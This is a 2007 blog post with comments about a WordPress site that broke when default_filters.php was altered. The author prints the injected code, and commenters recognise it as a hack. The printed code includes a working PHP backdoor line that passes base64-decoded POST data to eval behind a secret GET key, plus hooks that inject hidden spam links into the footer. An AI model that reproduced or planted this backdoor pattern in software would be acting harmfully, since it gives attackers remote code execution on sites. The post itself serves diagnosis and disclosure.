Blog error

Adrian Spender | Uncategorized | Friday, November 30th, 2007

This blog appeared to be down for some time today. It appeared that somehow the default_filters.php file in Wordpress got some corruption. Replacing it with the default file from a Wordpress 2.3.1 download solved the problem. Google hasn’t thrown up anything that throws any light on the problem. The corrupted file had a timestamp of today and contained some additional stuff over and above the default file content, such as:

This was declared at the top of he file:

if($_GET['0cc9b18defb8385c']==”1a84882ba2eb254c”){ eval(base64_decode($_POST['file'])); exit; }

Then there was this add_action function:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
shuffle($wparr);
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "“.ucwords($v['key']).”\n”;
if($i++==$inum) break;
}
echo “!/div!”.$_footer;
}
}

And this at the bottom:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "“.ucwords($v['key']).”\n”;
if($i++==$inum) break;
}
echo “!/div!”.$_footer;
}
}

(N.B. !div! is an HTML DIV tag but this causes problems if I embed it in the post)

Which is obviouly trying to declare the same function ‘wpc7c16b8466d864eeefd20050625c7775′ twice (which the error message identified) I have no idea what was inserting this code, so I’ve left it all out for the time being. I suspect it may be a badly behaving plugin, so apologies if some aspect of the blog doesn’t work correctly. If anybody has any ideas I’d love to hear them.

4 Comments »

  1. Looks to me like your blog got hacked and that is the code for a backdoor…
    The first line looks like it allows someone to load a file into your blog via a http post, which means they can do whatever they want.

    I would change passwords on the blog and start checking for other security problems - That code is not benign!

    Comment by Anton Piatek — December 1, 2007 @ 4:23 pm

  2. Unfortunately it looks like you are right. class-mail.php isn’t part of Wordpress and seems to have been inserted into my wp-includes directory somehow, probably by the method you highlight. How somebody got the backdoor in in the first place is unknown. There is nothing to suggest that they gained access to the filesystem on my host (and no it isn’t world-writable either)

    The contents of class-mail.php contained the assignment of two variables to the contents of a couple of Base 64 encode strings. One contained a load of binary data and some links to an innocuous looking web site blog at digitalsweeties.com The second decoded into a Javascript function to display an ad from googlesyndication.com

    Looks like it has happened to others as well, and is probably an exploit of a Wordpress vulnerability

    Comment by Adrian Spender — December 1, 2007 @ 5:14 pm

  3. Edited to add. This happened well after I recently upgraded to Wordpress 2.3.1 as well!

    Comment by Adrian Spender — December 1, 2007 @ 5:15 pm

  4. Eek. Well I assume that WP.com blogs are not vulnerable to whatever backdoor these folks found.

    Comment by Andy Piper — December 13, 2007 @ 4:31 am

RSS feed for comments on this post. TrackBack URI

Leave a comment

Powered by WordPress | Theme by Roy Tanck